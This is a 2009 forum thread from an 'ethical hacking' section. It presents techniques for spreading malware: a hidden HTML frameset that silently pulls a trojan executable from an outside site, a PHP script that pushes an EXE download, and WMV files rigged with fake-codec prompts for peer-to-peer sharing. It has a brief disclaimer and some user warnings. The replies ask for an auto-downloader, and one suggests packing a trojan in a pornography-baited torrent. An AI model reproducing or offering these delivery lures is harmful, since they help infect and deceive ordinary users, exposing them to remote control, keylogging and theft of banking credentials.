Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Different Techniques use to infect Malwares Around the internet! (http://www.go4expert.com/articles/techniques-infect-malwares-internet-t15816/)

P455w0rd_Cr4kz 14Jan2009 00:23

Different Techniques use to infect Malwares Around the internet!
 
Before i start writing this small article i want to say that the presented information is for educational purposes and by no means Go4expert or myself takes any responsability for any misuse of the information and mentioned tools.


However,i must say there are plenty more tactics,tools and tricks.

Simply by using a php file,you can use it as a trojan/malware downloader.

Iframe in HTML Method
Example of this is:

HTML Code:

<html><head><title> </title></head><frameset rows="0,*">
<frame src="http://webisite.com/CALC.EXE" name="top_frame" frameborder="0" scrolling="no" noresize="noresize" marginheight="0" marginwidth="0"/>
<noframes></body></noframes></frameset></html>

Note CALC>exe (that would be the trojan)
================================================== ========

Octect/sockets en PHP Method

With a php file you can use a short script to call your .exe file and ask for the download. Note that the PHP file and the EXE file must be in the same path,or you can also modify the path in the $flnm="file.exe"

Example:
PHP Code:

<?php
$flnm 
"archive.exe";
$size filesize($flnm);
$fp fopen($flnm"r");
$src fread($fp$size);
fclose($fp);
header("Accept-Ranges: bytes\r\n");
header("Content-Length: ".$size."\r\n");
header("Content-Disposition: inline; filename=".$flnm);
header("\r\n");
header("Content-Type: application/octet-stream\r\n\r\n");
echo 
$src;
?>

================================================== ========
WMV With URLANDEXIT

This Method is very popular this days.Nowadays you can spread malware by uploading tricked wmv files to limewire/ares and other file/moviews shared sites.

With tools like the one shown below you can edit the wmv file to set up a stop time on the file and ask a user to download a fake codec.
http://www.go4expert.com/images/arti...veditorcn8.jpg

If you look closely,when the innocent user tries to watch the movie clip,it will show them a message asking for the download. Please see the picture below for a better idea.
http://www.go4expert.com/images/arti...d/vidjhwz2.jpg

================================================== ========
Be aware of your settings in your pc, do not download anything from a website you don't trust. Below is a picture of an old downloader that used the exploit on old IE/windos This Tool will create a downloader with an extension Jpeg including the picture icon


http://www.megasecurity.org/trojans/...nloader1.0.gif


================================================== ========
The same exploits were used and were very popular couple of years back using a Html downloader. Please see below for a picture so you can have a better idea.


http://www.megasecurity.org/trojans/...odwill1.06.gif


================================================== ========

These has been some of the most popular tools used time ago. Obviously and as you should be aware;the techniques are getting more sophisticated by the day.

On purpose i have not mentioned any of the websites where you can download this tools. Researching is the most accurate way to be uptodate on this bad intentioned people tactics to make innocent internet users get inffected.

Why would a hacker/script kiddie go thru all this programs and set up websites?

It is very simple,once you get inffected with a RAT( remote Administration tools) they have complete access to your computer. All your most personal information is exposed to them. And......they can use your pc as a zombie to atack other sites via DDOS.

Also understand that even with a simple Keylogger( keystroke Recorder) they could access all your emails,all your online banking sites,paypal and lots of your personal info.

I hope this article was interesting for you. I am recovering at this moment from a very serious surgery,so please don't message me trying to get links for downloading this tools.
P455w0rd_Cr4kz

TriG0rZ 15Jan2009 02:13

Re: Different Techniques use to infect Malwares Around the internet!
 
thanks for the info man, imo its always good to learn about how these tech were used in order to prevent them happening from you and they really are good for educational purpose's!

Bhullarz 17Jan2009 09:54

Re: Different Techniques use to infect Malwares Around the internet!
 
Really Nice one !!!

hanleyhansen 21Jan2009 19:56

Re: Different Techniques use to infect Malwares Around the internet!
 
Great stuff!!

shabbir 4Feb2009 11:00

Re: Different Techniques use to infect Malwares Around the internet!
 
Nomination for article of the month for January 2009 Started

NDL 5Feb2009 10:21

Re: Different Techniques use to infect Malwares Around the internet!
 
Nice stuff

indiansword 5Feb2009 13:13

Re: Different Techniques use to infect Malwares Around the internet!
 
1 question in that php script if we include any exe file, will user be prompted to download it? is there any way for auto downloader??

shabbir 18Feb2009 10:19

Re: Different Techniques use to infect Malwares Around the internet!
 
Start Voting for this article for Article of the month January 2009

asadullah.ansari 20Feb2009 10:37

Re: Different Techniques use to infect Malwares Around the internet!
 
It's really nice...

indiansword 20Feb2009 21:15

Re: Different Techniques use to infect Malwares Around the internet!
 
other way i cud suggest is put ur trojan and pack it in a torrent! put something good like aishwarya rai's xxx and all.. u get 1000s of downloads a day... and ur ftp is blown out because of logs :P

shabbir 2Mar2009 16:05

Re: Different Techniques use to infect Malwares Around the internet!
 
Winner of Article of the month for January 2009


All times are GMT +5.5. The time now is 00:46.